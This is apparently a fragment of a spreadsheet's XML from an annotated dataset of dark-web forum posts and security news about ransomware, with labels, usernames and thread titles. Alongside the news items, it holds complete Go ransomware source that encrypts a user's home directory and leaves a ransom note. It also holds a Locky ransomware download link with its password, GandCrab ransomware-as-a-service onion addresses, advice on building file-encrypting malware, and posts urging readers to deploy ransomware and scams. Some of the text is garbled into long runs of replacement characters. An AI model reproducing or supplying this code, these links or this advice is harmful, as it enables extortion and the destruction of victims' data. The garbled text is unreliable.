  <si>
    <t>0 days 22:25:00</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;fbi, cisa, and ms-isac warned today of u.s. school districts being increasingly targeted by the vice society ransomware group, with more attacks expected after the start of the new school year.;;;"the fbi, cisa, and the ms-isac have recently observed vice society actors disproportionately targeting the education sector with ransomware attacks," today's joint advisory reads.;;;they also "anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks.";;;the joint advisory also provides network defenders with vice society indicators of compromise (iocs) and tactics, techniques, and procedures (ttps) observed by the fbi in attacks as recently as september 2022.;;;"the fbi, cisa, and the ms-isac encourage organizations to implement the recommendations in the mitigations section of this csa to reduce the likelihood and impact of ransomware incidents," the advisory adds.;;;attacks on the education sector, mainly targeting kindergarten through k-12 institutions, have a massive impact on their operations, ranging from restricted access to networks and data, delayed exams, and canceled school days to the theft of personal information belonging to students and school staff.;;;one such attack was disclosed today by los angeles unified (lausd), the second largest school district in the u.s., after a ransomware attack took down some of its information technology (it) systems over the weekend���lausd hasn't yet attributed the attack to a specific ransomware gang.;victims asked to share attack details with the fbi;;;network defenders are advised to take measures to defend against and limit the impact of ransomware attacks, including prioritizing and remediating known exploited vulnerabilities, training their users to recognize and report phishing attempts commonly used as initial attack vectors, and enabling and enforcing multifactor authentication.;;;the fbiasked victims to share logs and other information linked to the attacks.;;;"the fbi is seeking any information that can be shared, to include boundary logs showing communication to and from foreign ip addresses, a sample ransom note, communications with vice society actors, bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file," the federal law enforcement agency said.;;;vice society is a threat group known for deploying multiple ransomware strains on their victims' networks, such as hello kitty/five hands and zeppelin ransomware.;;;they also steal sensitive data from compromised systems before encryption and later use it for double-extortion, threatening their victims to leak the stolen data if their ransom demand isn't paid.;;;one of the group's recent victims is the austrian medical university of innsbruck which was forced to reset all 3,400 students' and 2,200 employees' account passwords after severe it service disruption and data stolen in the attack being leaked on the gang's data leak site.;;https://www.bleepingcomputer.com/news/security/fbi-warns-of-vice-society-ransomware-attacks-on-school-districts;;https://malware.news/t/aa22-249a-stopransomware-vice-society/63146</t>
  </si>
  <si>
    <t xml:space="preserve">News article warning us school districts after 2 of them hit by Vice society ransomware </t>
  </si>
  <si>
    <t>/d/CyberSecurity</t>
  </si>
  <si>
    <t>a74a0037d83eab5a0179</t>
  </si>
  <si>
    <t>FBI warns of Vice Society ransomware attacks on school districts</t>
  </si>
  <si>
    <t>2 days 19:32:00</t>
  </si>
  <si>
    <t>heh they should try recruiting the children... i know i would've committed high treason for a day off school</t>
  </si>
  <si>
    <t>User joking regarding the previous post</t>
  </si>
  <si>
    <t>/u/Anonymator59</t>
  </si>
  <si>
    <t>the hidden container is for situations where i need to hand over an "apparently" working key. the self-destruct button is more just a doomsday scenario type option, lol. other ideas i've been kicking around is actually or pretending to be a victim of ransomware. pretending would just be encryption i've fubar and a spoof screen showing whatever popular ransomware displays, even though the info is all fake. this would be opposed to activating real ransomware (but run by yours truly) when i activate my "oh shit" button.;;there's many options. i'm satisfied with my current opsec, but i'm a total nerd for this kind of stuff, lol.</t>
  </si>
  <si>
    <t>User discussing the idea of using ransomware tactics to gain de-cryption keys</t>
  </si>
  <si>
    <t>debate / other</t>
  </si>
  <si>
    <t>/u/silentsound</t>
  </si>
  <si>
    <t>19/07/2021 11:08</t>
  </si>
  <si>
    <t>b9e73c10b8a7b9afb278</t>
  </si>
  <si>
    <t>FDE and LE asking for decryption keys</t>
  </si>
  <si>
    <t>3 days 01:13:00</t>
  </si>
  <si>
    <t>fujifilm is investigating a ransomware attack and has shut down portions of its network to prevent the attack's spread.;;fujifilm, also known as just fuji, is a japanese multinational conglomerate headquartered in tokyo, japan, which initially started in optical film and cameras. it has grown to include pharmaceuticals, storage devices, photocopiers and printers (xerox), and digital cameras.;;fujifilm earned $20.1 billion in 2020 and has 37,151 employees worldwide.;;today, fujifilm announced that their tokyo headquarters suffered a cyberattack tuesday night that they indicate is a ransomware attack.;;"fujifilm corporation is currently carrying out an investigation into possible unauthorized access to its server from outside of the company. as part of this investigation, the network is partially shut down and disconnected from external correspondence," fujifilm said in a statement.;;"we want to state what we understand as of now and the measures that the company has taken. in the late evening of june 1, 2021, we became aware of the possibility of a ransomware attack. as a result, we have taken measures to suspend all affected systems in coordination with our various global entities.";;"we are currently working to determine the extent and the scale of the issue. we sincerely apologize to our customers and business partners for the inconvenience this has caused.";;due to the partial network outage, fujifilm usa has added an alert to the top of their website stating that they are experiencing network problems that are impacting their email and phone systems.;;while fujifilm has not stated what ransomware group is responsible for the attack, advanced intel ceo vitali kremez has told bleepingcomputer that fujifilm was infected with the qbot trojan last month.;;"based on our unique threat prevention platform andariel, fujifilm corporate appeared to be infected with qbot malware based on may 15, 2021," kremez told bleepingcomputer. "since the underground ransomware turmoil, the qbot malware group currently works with the revil ransomware group.";;"a network infection attributed to qbot automatically results in risks associated with future ransomware attacks.";;the operators of the qbot trojan have a long history of working with ransomware operations to provide remote access to compromised networks.;;in the past, the prolock and egregor ransomware gangs partnered with qbot, but with the shutdown of those operations, the revil ransomware operation has been utilizing the botnet.;;while ransomware has been active since 2012, it has recently gained worldwide attention after the attacks on colonial pipeline, the us's largest fuel pipeline, and the world's largest beef producer, jbs.;;the us government has created a ransomware task force to recommend new policies and guidelines for battling the growing threat.</t>
  </si>
  <si>
    <t>Post discussing the fujifilm ransomware attack</t>
  </si>
  <si>
    <t>163cb44f0d919b1df7e9</t>
  </si>
  <si>
    <t>FUJIFILM shuts down network after suspected ransomware attack</t>
  </si>
  <si>
    <t>{'revil': 2, 'ransomware': 12}</t>
  </si>
  <si>
    <t>threat actors impersonate the now-defunct darkside ransomware operation in fake extortion emails sent to companies in the energy and food sectors.;;the darkside ransomware operation launched in august 2020, targeting corporate networks and demanding millions of dollars for a decryptor and a promise not to release stolen data.;;after hitting colonial pipeline, the largest fuel pipeline in the us, the ransomware gang was thrust into the spotlight, with the us government and law enforcement shifting their focus to the group.;;this increased scrutiny by enforcement led to darkside suddenly shutting down its operation in may out of fear of being arrested.;;since then, there has been no additional activity from its group or known aliases.;;in a new report, trend micro researchers reveal that a new extortion campaign started in june where threat actors are impersonating the darkside ransomware gang.;;"several companies in the energy and food industry have recently received threatening emails supposedly from darkside," explains trend micro researcher cedric pernet.;;"in this email, the threat actor claims that they have succesfully hacked the target's network and gained access to sensitive information, which will be disclosed publicly if a ransom of 100 bitcoins (btc) is not paid.";;this new extortion campaign consists of emails sent to companies or through their website contact forms that state the ransomware gang hacked the company's servers and stole data during the attack. the email says that the company must pay 100 bitcoins to an enclosed bitcoin address, or threat actors will publicly release the documents.;;you can read the entire extortion message below:;;hi, this is darkside.;;it took us a lot of time to hack your servers and access all your accounting reporting. also, we got access to many financial documents and other data that can greatly affect your reputation if we publish them.;it was difficult, but luck was helped by us - one of your employees is extremely unqualified in network security issues. you could hear about us from the press - recently we held a successful attack on the colonial pipeline.;;for non-disclosure of your confidential information, we require not so much - 100 bitcoins. think about it, these documents may be interested not only by ordinary people, but also the tax service and other organizations, if they are in open access ... we are not going to wait long - you have several days.;;our bitcoin wallet - bc1qcwrl3yaj8pqevj5hw3363tycx2x6m4nkaaqd5e;;according to trend micro, all of the emails use the same bitcoin address. an extortion demand submitted through a site's contact form and seen by bleepingcomputer showed that this bitcoin address is bc1qcwrl3yaj8pqevj5hw3363tycx2x6m4nkaaqd5e.;;at this time, the bitcoin address has seen no payments and will likely not in the future, considering the ridiculous $3.6 million bitcoin demand.;;trend micro states that the emails they have seen are being sent from the darkside@99email[.]xyz and darkside@solpatu[.]space email addresses, with 99email.xyz account being a throwaway email account service.;;it is not clear why the wannabe extortionists are only targeting the food and energy sector, but it is believed to be because recent attacks in those industries have been quick to pay a ransom.;;after colonial pipeline was attacked, they paid a $4.4 million ransom to darkside, with the majority of the ransom later recovered by the fbi.</t>
  </si>
  <si>
    <t>Post about someone using the darkside name (at this time a defunct group) to trick and perform ransomware attacks on multiple buissness via extortion emails</t>
  </si>
  <si>
    <t>21/06/2021 01:14</t>
  </si>
  <si>
    <t>1bc07db2586099fc5307</t>
  </si>
  <si>
    <t>Fake DarkSide gang targets energy, food industry in extortion emails</t>
  </si>
  <si>
    <t>0 days 17:09:00</t>
  </si>
  <si>
    <t>{'extortion': 5, 'darkside': 4, 'ransomware': 5}</t>
  </si>
  <si>
    <t>i sent my 9000 ransomware to your girls panties &amp; unless you pay me what we demand no booty for you!!!!!;;oh &amp; this, throw in a cracker barrel gift card as well.  the crew gotta eat!!!!!;;baweewerrrrewweerr!!!!!!</t>
  </si>
  <si>
    <t>Known ransomware creator making posts</t>
  </si>
  <si>
    <t>21/06/2021 01:38</t>
  </si>
  <si>
    <t>0 days 00:18:00</t>
  </si>
  <si>
    <t>i have a target and i need to reach it soon, will do anything. what are my options?</t>
  </si>
  <si>
    <t>User asking for a quick way to make a large amount of money</t>
  </si>
  <si>
    <t>7c35cd08ab5b14d2741f</t>
  </si>
  <si>
    <t>Fastest way to make a million dollars</t>
  </si>
  <si>
    <t>0 days 20:29:00</t>
  </si>
  <si>
    <t>selecting proper targets, deploying ransomware, rats, password stealers, bec scams, carding, etc. all in one go.;;go full tilt for a couple of months, re-evaluate, tweak methods, and stay focused.</t>
  </si>
  <si>
    <t>User responding suggesting to try everything including ransomware</t>
  </si>
  <si>
    <t>0 days 06:51:00</t>
  </si>
  <si>
    <t>i have lots of targets to spread ransomware. i'm finding a good raas provider with fud ransomware.;is there any onion url of raas?</t>
  </si>
  <si>
    <t>User asking for raas provider with fud ransomware</t>
  </si>
  <si>
    <t>hacker (individual) / information (request)</t>
  </si>
  <si>
    <t>/u/rig2896</t>
  </si>
  <si>
    <t>25/02/2020 22:02</t>
  </si>
  <si>
    <t>b9ad8ee8e9289257ff4d</t>
  </si>
  <si>
    <t>Find RaaS provider</t>
  </si>
  <si>
    <t>0 days 04:21:00</t>
  </si>
  <si>
    <t>is raas a thing?</t>
  </si>
  <si>
    <t>User asking what is raas</t>
  </si>
  <si>
    <t>/u/newbmm</t>
  </si>
  <si>
    <t>26/02/2020 02:23</t>
  </si>
  <si>
    <t>hello everyone,;;i want to get used to write malware and ransomware. i want to completely understand how it works, how i can spread it, how i can detect it and what to do when files are encrypted.;;so therefore, my opinion was to write some code that encrypts normal txt files for example.;let's assume that i have a folder with five text files and if i execute my malware program, all my five files are encrypted and i need a password for that files now.;it should be like in programming where you start with "hello world".;;i wanted to ask you now, where i should start. i am quite comfortable with different programming languages.;didn't find a tutorial that deals with that...maybe i have to start somewhere else to get familiar with malware and ransomware.;;thanks community,you are all great!</t>
  </si>
  <si>
    <t>User asking information on how to understand and learn ransomware</t>
  </si>
  <si>
    <t>92ff57a109095fd79d3c</t>
  </si>
  <si>
    <t>First Malware / Ransomware</t>
  </si>
  <si>
    <t>17 days 01:22:00</t>
  </si>
  <si>
    <t>i want to start coding malware too(ransomware) with python by preference.;i hope to find help here</t>
  </si>
  <si>
    <t>/u/sudo_overloord</t>
  </si>
  <si>
    <t>it`s something that you don`t need a tutorial for.;think this way -&gt; you have a string and want to encrypt that, then you will import some aes encryption library, create a password, a nonce and call the function using your plain text string as parameter.;with this part working, think that you have a file and copied it`s content to your byte array. now you can just call the function that you created earlier to encrypt your string. then, get the byte array output and write over to the file.;now, just read all files from a folder and repeat the same step. and, if you want even more, make your code to go inside a folder that is inside this main directory and encrypt everything there and so on.;;this is the basics.</t>
  </si>
  <si>
    <t>User providing information on how to set up ransomware</t>
  </si>
  <si>
    <t>/u/genlit</t>
  </si>
  <si>
    <t>0 days 02:24:00</t>
  </si>
  <si>
    <t>dont use python if you want to write quality malware</t>
  </si>
  <si>
    <t>User stating they believe python is not a good language for malware</t>
  </si>
  <si>
    <t>/u/mali</t>
  </si>
  <si>
    <t>what do you think is a good language for malware?;c?</t>
  </si>
  <si>
    <t>User asking for information on the best language for malware</t>
  </si>
  <si>
    <t>0 days 16:05:00</t>
  </si>
  <si>
    <t>hello there. you can try reverse engineering to decrypt the existing code and learn from it or rewrite to your needs. you can find basic to advanced ransomware along with guides on putinsclub store as they are a group of hacking experts. try them out.</t>
  </si>
  <si>
    <t>User providing information on where to find ransomware</t>
  </si>
  <si>
    <t>/u/jenkinsny</t>
  </si>
  <si>
    <t>18/04/2022 14:06</t>
  </si>
  <si>
    <t>16 days 01:18:00</t>
  </si>
  <si>
    <t>hi guys! i've been studying about golang and you usage in malware coding.;some weeks ago i coded my first ransomware... of course, ----&gt;i know &lt;------ this is not like a professional ransomware gang, this don't check whether is within a vm or not. i dont need you talking it in comments.;this was just to practice my skills in go and my ideas... i'm brushing up it.;;;package main
import (
    "crypto/aes"
    "crypto/cipher"
    "crypto/rand"
    "io"
    "io/ioutil"
    "os"
    "path/filepath"
    "strings"
    "sync"
)
var (
    cipher_key = &amp;lsqb;&amp;rsqb;byte("0123456789012345")
)
func encryptfile(wg *sync.waitgroup, file string) {
    defer wg.done()
    plaintext, _ := ioutil.readfile(file)
    block, _ := aes.newcipher(cipher_key)
    gcm, _ := cipher.newgcm(block)
    nonce := make(&amp;lsqb;&amp;rsqb;byte, gcm.noncesize())
    io.readfull(rand.reader, nonce)
    ciphertext := gcm.seal(nonce, nonce, plaintext, nil)
    ioutil.writefile(file+".dreadlock", ciphertext, 0777)
    os.remove(file)
}
func decryptfile(wg *sync.waitgroup, file string) {
    defer wg.done()
    ecnryptedfile, _ := ioutil.readfile(file)
    block, _ := aes.newcipher(cipher_key)
    gcm, _ := cipher.newgcm(block)
    nonce := ecnryptedfile&amp;lsqb;:gcm.noncesize()&amp;rsqb;
    ecnryptedfile = ecnryptedfile&amp;lsqb;gcm.noncesize():&amp;rsqb;
    plaintext, _ := gcm.open(nil, nonce, ecnryptedfile, nil)
    ioutil.writefile(strings.replace(file, ".dreadlock", "", -1), plaintext, 0777)
    os.remove(file)
}
func leftmsg(dir string) {
    homedir, _ := os.userhomedir()
    msg := &amp;lsqb;&amp;rsqb;byte("your message to be left, with your wallet btc sa7dfysfysd78yfe8w7fh873fsdj\n" + "the phantom of the opera")
    ioutil.writefile(homedir+"\\readme.txt", msg, 0777)
}
func enc(dirname string) {
    //var wg sync.waitgroup // variable used to control threads
    wg := &amp;sync.waitgroup{}
    filepath.walk(dirname,
        func(path string, info os.fileinfo, err error) error {
            if err != nil {
                return err
            }
            if !info.isdir() { // add only files in map
                wg.add(1)
                go encryptfile(wg, path)
            }
            return nil
        })
    leftmsg(dirname)
    wg.wait()
}
func dec(dirname string) {
    //var wg sync.waitgroup // variable used to control threads
    wg := &amp;sync.waitgroup{}
    filepath.walk(dirname,
        func(path string, info os.fileinfo, err error) error {
            if err != nil {
                return err
            }
            if !info.isdir() { // add only files in map
                wg.add(1)
                go decryptfile(wg, path)
            }
            return nil
        })
    wg.wait()
}
func main() {
    dirname, _ := os.userhomedir() // get user home dir
    enc(dirname) // this method will be used to encrypt
    //dec(dirname) // this method will be used to decrypt
    /*
        you'd better compile each build with one method, or enc or dec.
        if you wanna build a ransomware, encrypt with no dec method.
    */
};</t>
  </si>
  <si>
    <t>User showing their golang ransomware and asking for feedback</t>
  </si>
  <si>
    <t>education (request) / raas provider (individual)</t>
  </si>
  <si>
    <t>/u/sagitari0</t>
  </si>
  <si>
    <t>28/10/2021 23:52</t>
  </si>
  <si>
    <t>0b75c777838e6ba3a3c0</t>
  </si>
  <si>
    <t>First ransomware in Golang</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;steve durbin is chief executive of information security forum. he is a frequent speaker on the board's role in cybersecurity and technology. there was an inevitable uptick in cybercrime in 2020, as organizations scrambled to support a freshly remote workforce in the face of a developing pandemic.;;the exponential growth of data continued apace, but the way we created, shared and stored much of that data changed. the struggle to secure the newly emerging landscape required swift innovation and forward-thinking organizations seized the opportunity to reevaluate infrastructure and policy.;;with the dust settling, it���s time to turn our eyes toward the year ahead. there���s a palpable need for business-savvy security strategies capable of linking security with business goals to achieve the right level of resilience. success requires a much higher degree of engagement and involvement with the business across all corporate assets. to prepare effectively, we must have ure of the major threats we face in 2021.;;;1. cybercrime;;the pandemic provided cover for a wave of cynical ransomware attacks on healthcare organizations and government departments in 2020. ransomware continues to evolve and develop, with criminals offering it as a service or as a bundled kit that anyone can buy on the darknet and deploy without any real technical skills. we can expect to see many more ransomware attacks in the months ahead.;;a combination of increasingly sophisticated phishing techniques and growing exhaustion and mental stress among the population has enabled malware to worm its way onto more and more systems. targeted attacks piggybacking on pandemic-related tests, alerts, medical news and government payouts, as well as partisan political debate, are enticing people to click when they shouldn���t, triggering malware downloads.;;;2. insiders;;organizations have always been at great risk from insiders. whether malicious, negligent or accidental, insiders hold the keys to the kingdom n do catastrophic damage to a company. cyber fatigue, endless screen time and a pervasive climate of stress are contributing to a major upswing in accidental insider incidents. there���s no intent to do wrong, but perhaps because people have to work in an unfamiliar environment, cope with distractions, and combat stress and exhaustion, they are more prone to make costly mistakes that can lead to serious data leaks.;;the trouble is that accidental insiders are hard to detect. how do you spot an individual like that ahead of time before the damage is done? we may need to take a more human-centric approach with security, measure the effectiveness of policies and work collaboratively with hr departments to nullify this threat. any action here must be handled sensitively to ensure there���s no erosion of hard-earned trust between company and employee.;;;3. the digital generation;;as the next generation comes of age and advances in a workplace that���s more distributed than ever before, we need toine our processes and policies. the digital generation has been encouraged to share information from an early age, communicate through social media and adopt technology readily.;;building security awareness is vital to combat cybercriminals employing sophisticated social engineering techniques to victimize employees struggling with security policies. to prevent these young workers from being exploited, we need training and awareness programs that address the way they do business and the channels they use to communicate.;;;4. edge computing;;edge computing is a really attractive architectural choice for organizations, but it's also a key target for attackers. by supporting widespread remote working, adopting more cloud services and embracing new technologies like 5g to realize their full potential, we���re also expanding the opportunity for attackers and giving them a wider attack surface to probe and penetrate.;;you need good insight into every device that is connected to your extended network, but thatnts some major challenges. rather than focusing on finding and eliminating blind spots, we need to get better at building security into the core infrastructure from the start. preserving the integrity of data requires a carefully designed security architecture.;;;5. digital transformation;;many organizations are beginning to discuss and assess the events of 2020, and some will realize that the way they have had to work during the pandemic will become the way they choose to work going forward. that will necessitate fairly complex digital transformation, deploying a whole range of different systems, and perhaps rebuilding certain infrastructures that they've deployed. this transformation won���t just be internal; it will have to encompass supply chain partners and integrate data across multiple systems.;;building on a series of legacy systems in a climate where investment is in short supply could prove very risky. it will be vital that security professionals get in on the ground floor to ensure that infor security is baked into every stage of digital transformation planning and resulting infrastructure rollout.;;cybercriminals will continue to attack and gain access to corporate systems whenever and wherever they can in 2021, so security must be front of mind. redesigned security awareness and refreshed policies, combined with a supportive approach that embraces edge computing and digital transformation, can tame the major threats that lie ahead and help businesses to build real resilience.</t>
  </si>
  <si>
    <t xml:space="preserve">news article regarding the vulrabillities covid-19 provided for cybercrime including ransomware including new potential targets </t>
  </si>
  <si>
    <t>6eb35e7b96e3ad45c3ed</t>
  </si>
  <si>
    <t>Five Threat Vectors Destined To Make Waves In 2021</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;hon hai precision industry co., better known as foxconn, has been struck by a ransomware attack that briefly caused issues at its production facilities in mexico and resulted in data stolen.;;first reported monday by bleeping computer, the ransomware attack occurred over the thanksgiving weekend and involved the infamous doppelpaymer gang. the attack, which targeted the foxconn plant in ciudad ju��rez, chihuahua, infected approximately 1,200 servers, with the theft of 100 gigabytes of unencrypted files. the ransomware attack also resulted in the deletion of 20 to 30 terabytes of backup data.;;the doppelpaymer gang is said to have demanded a ransom payment of 1804.0955 bitcoin ($32.97 million) in return for an encryption key and a promise not to release the stolen data. foxconn didn���t pay and at least some of the data has now been published on the dark web, a shady part of the internet reachable with a special browser.;;���our team had access to doppel ranso the deep web where they publish their victims��� stolen data and we can confirm that they have published data about foxconn technology group,��� gustavo palazolo, security researcher at secure access company appgate, told siliconangle. ���by looking at the list of organizations/targets from this and other threat groups behind large ransomware operations, we found a very diverse list of targets, so we have the impression that the threat actors are trying to make money no matter the type or size of the organization.���;;reuters reported that services at the facility have gradually returned to normal, though the website for the plant remains offline. foxconn���s facilities in mexico primarily make televisions and servers. the company is also looking to expand its manufacturing in the country because of the u.s.-china trade war. brands manufactured at the plant include belkin and sharp, both of which are owned by foxconn.;;recent doppelpaymer ransomware victims include endemol shiney behind television shows such as ���big brother,��� ���masterchef��� and ���the voice��� in november and an attack on mexican state-owned petroleum company petr��leos mexicanos, known as pemex, in november 2019.;;ilia kolochenko, founder and chief executive of web security company illumniweb, noted that the incident clearly indicates that ransomware mostly exploits major cybersecurity failures such as lack of internal network segregation.;;���allegedly, the attackers managed to compromised over 1,000 servers and delete all backups,��� kolochenko said. ���if true, this is an unambiguous indicator of gross negligence and absence of the most fundamental security controls. it���s unlikely any cybersecurity insurance will ever pay a cent for the damages under the circumstances, while the victim will likely have a solid claim against</t>
  </si>
  <si>
    <t>news article describing a ransomware attack at Foxconn plant by DopplePaymer</t>
  </si>
  <si>
    <t>20/12/2020 00:02</t>
  </si>
  <si>
    <t>28d1b46c8f4d037a45df</t>
  </si>
  <si>
    <t>Foxconn Plant in Mexico Struck in DoppelPaymer Ransomware Attack</t>
  </si>
  <si>
    <t>{'ransomware': 7}</t>
  </si>
  <si>
    <t>free locky ransomware : https://anonfiles.com/z4n0ye78q3/locky_rar;pass : locky;;we will upload free viruses each week so stay at my profile.;;;we will host a web and make forum hacking,malware,and cybersecurity related. soon.;if you want to donate for this project you can donate to :;;litecoin : mtyedqdxugrj9q4pxgpb6gmj4cc8wvovom;bitcoin : 382en3vk4gxfkv1lkqyg7joez2bb5hvolf;;your donate will be really appreciate.;;p.s. if you have any suggestions you can comment below or pm me. we need suggestions about hosting services.</t>
  </si>
  <si>
    <t>Post advertising new ransomware and donation page</t>
  </si>
  <si>
    <t>/u/AsRock</t>
  </si>
  <si>
    <t>eeb031f22cd39dd45535</t>
  </si>
  <si>
    <t>Free Malware</t>
  </si>
  <si>
    <t>1 days 11:54:00</t>
  </si>
  <si>
    <t>obvious lazy hacker. keep trying.</t>
  </si>
  <si>
    <t>user disagreeing with the donation page calling it lazy</t>
  </si>
  <si>
    <t>/u/PourYou</t>
  </si>
  <si>
    <t>0 days 12:45:00</t>
  </si>
  <si>
    <t>not really, i just want to share this but it seems people don't like it.</t>
  </si>
  <si>
    <t>0 days 10:13:00</t>
  </si>
  <si>
    <t>maybe. if your intentions are truly educational/informative i'm sure there are dedicated subdreads for that, i don't participate in them but maybe try;/d/hacking;. also, you just joined 4 months ago and don't have much activity here. build a reputation for yourself then people might trust you. good luck. although, if those are not your intentions then fuck off</t>
  </si>
  <si>
    <t>0 days 12:56:00</t>
  </si>
  <si>
    <t>by: sam jona july 4, 2018;;the europol has announced the arrest of a 25 year old french national who was involved in the cyber-attack of several companies in the past few years. the investigation that led to his arrest started last year when a group of hackers known as the ���rex mundi��� were identified to be behind a hacking case that led to the breach of sensitive data of a top uk firm. five members of the gang were arrested in june last year, and two were also arrested in october last year, according to the europol.;;based on a search warrant issued by the french national police, the royal thai police and the support of the europol and the joint cybercrime action taskforce conducted an intensive search leading to the arrest of the rex mundi member in may of this year. together with the accomplices, the 25 year old made a uk firm his top target and successfully hacked and held their data captive.;;according to the europol, the gang had two options for the hacked firm after proving that they hadeir data. the firm was told to either pay a ransom of ���580,000 to save their data from being displayed to the public or pay ���825,000 to be lectured on how the data was hacked and also, information on how to handle it.;;the company was also threatened with ���210,000 penalty each day supposing they would not meet the deadline. the law enforcement was therefore contacted by the firm, of which the uk metropolitan police, the europol and the french national police teamed up to trace and identify the suspects. the french police, therefore, arrested five of the members of the gang. the main suspect admitted to being involved in the cyber attack, however, he said to the police that he hired a cybercriminal on the dark web to carry out the attack. the report did not make it clear whether the hackers also sold compromised data on the dark web; however, most of their software for this process was acquired on the online black market.;;the police have advised cybercrime victim���s not to pay ahould instead contact the appropriate authorities right away in such incidences. the rex mundi group has a history of blackmailing companies with their hacked private data. a financial institution, swiss banque cantonale de geneve had their data compromised by the rex mundi in some years back. the hacking gang demanded a ransom of ���10,000. however, the financial institution refused to pay the said amount. the gang, therefore, published the hacked data as promised. the financial institution admitted that the published data had no effect on their customer records.;;the europol, after the arrest, announced that the hacking details explain why the cybercriminals always make medium sized and large companies their top target. ���this case illustrates that cyber-related extortion remains a common tactic among cybercriminals���financially motivated extortion attempts, and attacks, are typically directed at medium-sized or large enterprises, with payment almost exclusively in bitcoins,��� saion, companies have been told to make cyber security their top priority, and also, to be careful about the links they click on. the europol has also arrested many hackers through their operation of seeking a crime-free world.;;the rex mundi hacked the personal details of domino���s pizza customers and threatened them to release them to the public if a quoted amount as ransom was not paid within a set up deadline. the gang obtained 650,000 personal contact details of the company���s branch in france and belgium. just like any other operation, they posted a link on their twitter homepage that led to the details of their operation. they obtained the full names, addresses, email addresses and passwords and their phone numbers. it was reported that the pizza company did not pay the ransom demanded by the renowned hackers.;;the rex mundi started operating in 2012 and has successfully hacked and blackmailed several companies in the world. some of their victims include: ���americash advance, webassurnal, buy way, hoststar, websolutions.it, numericable, habeas, alfanet.���;;cybercriminals have been a thorn in the flesh of french companies, having made $400,000 in some few months.;;;;http://deepdot35wvmeyd5.onion/2018/07/04/french-national-behind-uk-data-breach-caught-in-thai</t>
  </si>
  <si>
    <t>Post about the culprit behind the Uk data breach in Thailand</t>
  </si>
  <si>
    <t>7546f697ef62dc6fc459</t>
  </si>
  <si>
    <t>French national behind UK data breach caught in Thailand</t>
  </si>
  <si>
    <t>long story short, im fresh out from doing 4 years for some petty shit and need some help. i could go on for days about all the bs and scams... but im sure you know where im at rn if youre already eating off this fraud shit. for the past 2 weeks all ive been doing is educating myself, i feel ik enough, i just need something that wont throw my last 250 away. anything is appreciated, any jewels or advice is a blessing. im a quick learner and am hungry to learn this game. methods, sites, socks, forums, loans, cpns, cashouts, number spoofers, anything that will help me invest into something bigger.;;psa - im not about to shoot anyone any money, im not tryin to buy, im posting to get advice and educate myself so im not some broke bum living in my moms trailer.</t>
  </si>
  <si>
    <t>User asking for education reasources/advice on what to do</t>
  </si>
  <si>
    <t>/u/Articulate74</t>
  </si>
  <si>
    <t>15/10/2021 21:06</t>
  </si>
  <si>
    <t>/d/Laundromat</t>
  </si>
  <si>
    <t>000e46d5983747f3f82c</t>
  </si>
  <si>
    <t>Fresh Out of Prison</t>
  </si>
  <si>
    <t>0 days 13:29:00</t>
  </si>
  <si>
    <t>don't waste too much time with credit card fraud these days and focus on delivering ransomware, rat, online scams, and the like. there's plently of information to crawl the fuck through on here to help guide you in the right direction and help determine where you fit in with the cybercrime ecosystem.;;once you've picked up on something that interests you and you think you're good at focus on that balls to the wall.;;this subdread is about money laundering though so first step is to post this in the appropriate thread to get better responses.</t>
  </si>
  <si>
    <t xml:space="preserve">User recommending stayng away from CC fraud and instead try ransomware and other scams </t>
  </si>
  <si>
    <t>16/10/2021 10:35</t>
  </si>
  <si>
    <t>hey,;i share gandcrab as a service ransomware, a link onion that i found on tor after contacting the support of the ransomware site the support is very responsive, you can ask them several things about the ransomware add full of options site to recommend. you have several screenshots of the dashboard available:;;link website: http://gandcr4cponzb2it.onion/ - http://gandcrabfd72vjxp.onion/;;link dashboard: http://gandcratjyr44pms.onion/ - http://gandcrasgyol4tol.onion/;;apparently, a forum is coming soon.;;attention i am in no way refundable thank you.</t>
  </si>
  <si>
    <t>User providing ransomware group (gandcrab) support list which contains a large amount of information</t>
  </si>
  <si>
    <t>/u/PartyGreen</t>
  </si>
  <si>
    <t>16/02/2019 16:42</t>
  </si>
  <si>
    <t>747cba71afa836c1211d</t>
  </si>
  <si>
    <t>GandCrab RaaS</t>
  </si>
  <si>
    <t>ok which one of you guys caused the gas shortage?  the news said it was hackers responsible!!!!  omgomgomg</t>
  </si>
  <si>
    <t>User asking who caused the "gas shortage" (most likely the colonal pipeline attack)</t>
  </si>
  <si>
    <t>/u/QuickieFlippie</t>
  </si>
  <si>
    <t>15/05/2021 01:07</t>
  </si>
  <si>
    <t>c96275533de90b9cdccf</t>
  </si>
  <si>
    <t>Gas shortage?</t>
  </si>
  <si>
    <t>2 days 00:46:00</t>
  </si>
  <si>
    <t>wasn't that by darkside?</t>
  </si>
  <si>
    <t>User stating colonal pipeline attack was performed by darkside (russian group)</t>
  </si>
  <si>
    <t>/u/yorutaru</t>
  </si>
  <si>
    <t>15/05/2021 01:22</t>
  </si>
  <si>
    <t>a hacking group based in russia. they claimed responsibility for it and said they're going to vet targets more thoroughly to prevent societal issues because of the issues that were caused by this.</t>
  </si>
  <si>
    <t>15/05/2021 05:05</t>
  </si>
  <si>
    <t>0 days 02:01:00</t>
  </si>
  <si>
    <t>yes and unless there's a mirror i'm unaware of their onion has been down ever since they got that 5 mil lmao;;edit: oh shit apparently they're out of the game. forgot to keep up with my krebs today i guess;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/e197d76490572c5f00a1</t>
  </si>
  <si>
    <t>15/05/2021 08:23</t>
  </si>
  <si>
    <t>0 days 03:17:00</t>
  </si>
  <si>
